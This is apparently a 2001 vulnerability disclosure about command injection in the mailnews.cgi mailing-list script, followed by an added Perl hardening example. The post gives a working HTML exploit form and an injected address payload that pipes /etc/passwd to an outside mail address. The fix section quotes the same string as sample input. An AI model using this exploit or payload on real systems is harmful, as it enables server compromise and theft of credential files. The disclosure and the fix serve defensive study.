From: Kanedaaa Bohater (kanedaAC.PL)
Date: Sun Feb 18 2001 - 16:04:54 CST


    Hello BuGReaders...

    ##Script: mailnews.cgi

    ##Introduction:

    <cat from source>
    CGI-Script MAILNEWS 1.3
    This script helps you to maintain a mailinglist.
    </cat>

    ##Tested Version: 1.1, 1.3

    The author doesn't parse some characters and he uses a very stupid
    "password protection". We can add or delete users from the mailing list
    without knowing the admin password. But this is a small problem ;] .
    Let's see what more we can do.
    <cat source>
            open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
    </cat>
    where $mailprog [default] is sendmail and $member is a user from the
    users file. Now we can do something like this: add the user
    "; cat /etc/passwd | mail adammalysz.pl" and use the subroutine to
    execute this code :]

    Simple exploit in html:

    <HTML>
    <BODY>
    <FORM
    ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
    <INPUT type=hidden NAME="action" value="subscribe">
    <BR>
    User to add with ; [ex:" ; cat /etc/passwd |mail adammalysz.pl"
    without quotes, of course ]<INPUT NAME="address" TYPE="TEXT">
    <INPUT TYPE="SUBMIT" VALUE="Submit">
    </FORM>
    <BR>
    <A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
    Execute command :] </A>
    <CENTER> Peace... </CENTER>
    </BODY>
    </HTML>

    Who : Kanedaaa
            kanedaac.pl

    ***$$$### " And maybe very many will not understand these words...
                    But there is no mercy for SONS OF BITCHES .... " ###$$*
    kanedaac.pl Bohater ... Boss ... Abuser ... Cucumber Team Member... Bzz..
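
The pipe open quoted in the post hands `$member` to a shell. As an added example (not part of the original post and not the script author's code), here is one way to harden that line in Perl: a list-form `open` that bypasses the shell, plus an allow-list check on the address. The sendmail path, the `valid_address` and `open_mail_pipe` names, the regex and the sample entries are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed default path; the post only says $mailprog defaults to sendmail.
my $mailprog = '/usr/sbin/sendmail';

# Conservative allow-list for subscriber addresses (an assumption, stricter
# than RFC 5322): no whitespace, no shell metacharacters, no leading '-'.
sub valid_address {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return 0 if $addr =~ /^-/;    # would be parsed by sendmail as an option
    # \A and \z anchor the whole string, so a trailing newline is rejected too.
    return $addr =~ /\A[A-Za-z0-9._%+-]+\@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\z/
        ? 1 : 0;
}

# Hardened replacement for: open (MAIL, "|$mailprog $member")
# List-form open executes the program directly, without /bin/sh, so $member
# is a single argv element and ';' or '|' in it are never interpreted.
sub open_mail_pipe {
    my ($member) = @_;
    die "rejected address\n" unless valid_address($member);
    # '-oi' stops a lone '.' from ending the message; '--' ends option parsing.
    open(my $mail, '|-', $mailprog, '-oi', '--', $member)
        or die "Can't open $mailprog: $!\n";
    return $mail;
}

# Constructed sample entries, as they might appear in the users file.
my @members = (
    'reader@example.org',
    '; cat /etc/passwd | mail someone@example.org',   # shape described in the post
    '-v@example.org',                                 # leading '-' looks like an option
    "reader\@example.org\n",                          # trailing newline
);

# Show the decision for each entry; only the first one is accepted.
for my $m (@members) {
    (my $shown = $m) =~ s/\n/\\n/g;
    printf "%-50s %s\n", "[$shown]", valid_address($m) ? 'accept' : 'reject';
}
```

Apply the same check when an address is written to the users file as well as when it is read back, since the file's contents are what reach the pipe.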